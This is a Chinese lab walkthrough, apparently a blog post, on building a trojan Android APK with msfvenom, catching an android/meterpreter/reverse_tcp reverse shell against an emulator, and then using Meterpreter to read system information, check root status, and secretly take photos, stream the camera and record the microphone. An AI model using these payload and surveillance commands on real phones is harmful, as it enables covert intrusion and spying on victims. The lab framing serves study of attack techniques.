0
点赞
收藏
分享

微信扫一扫

linux 网络命令

目录

目录

前言

系列文章列表

渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2

思维导图

1,实验涉及复现环境   

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

2.2,安装雷电模拟器 

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

2.3.2,进行配置 

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

3.2,将文件复制到windows系统上

3.3,将apk文件安装到模拟器中

3.4,木马文件安装成功

4,使用metasploit控制台对模拟器进行攻击

4.1 启动metasploit

4.2,使用攻击模块

4.3,设置攻击载荷

4.4,设置攻击机和端口号和攻击:

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

5, 成功后我们能做什么?

5.1,查看模拟手机的版本信息

5.2,查看手机的网络信息

5.3,查看root状态

5.4,启用网页视屏聊天

5.5,查看手机有几个摄像头

5.6,进行录音操作

5.7,一些其他操作

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结


前言

系列文章列表


渗透测试基础之永恒之蓝漏洞复现icon-default.png?t=N7T8http://t.csdn.cn/EsMu2

思维导图

1,实验涉及复现环境   

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq.com)icon-default.png?t=N7T8https://www.ldmnq.com/

2.2,安装雷电模拟器 

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

2.3.2,进行配置 

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.223.138 lport=5001 >内心如初.apk

3.2,将文件复制到windows系统上

3.3,将apk文件安装到模拟器中

3.4,木马文件安装成功

4,使用metasploit控制台对模拟器进行攻击

4.1 启动metasploit

msfconsole 

4.2,使用攻击模块

use exploit/multi/handler

4.3,设置攻击载荷

set payload android/meterpreter/reverse_tcp

4.4,设置攻击机和端口号和攻击:

set lhost 192.168.xxx.xxx
set lport 5001
run

 

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

5, 攻击成功后我们能做什么?

                                    这里在进行其他操作前需要先加载stdapi扩展

load stdapi

5.1,查看模拟手机的版本信息

sysinfo

5.2,查看手机的网络信息

ifconfig

5.3,查看root状态

check_root

5.4,启用网页视屏聊天

webcam_chat

5.5,查看手机有几个摄像头

webcam_list

5.6,进行录音操作

record_mic

5.7,一些其他操作

webcam_snap
webcam_stream

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结

举报

相关推荐

0 条评论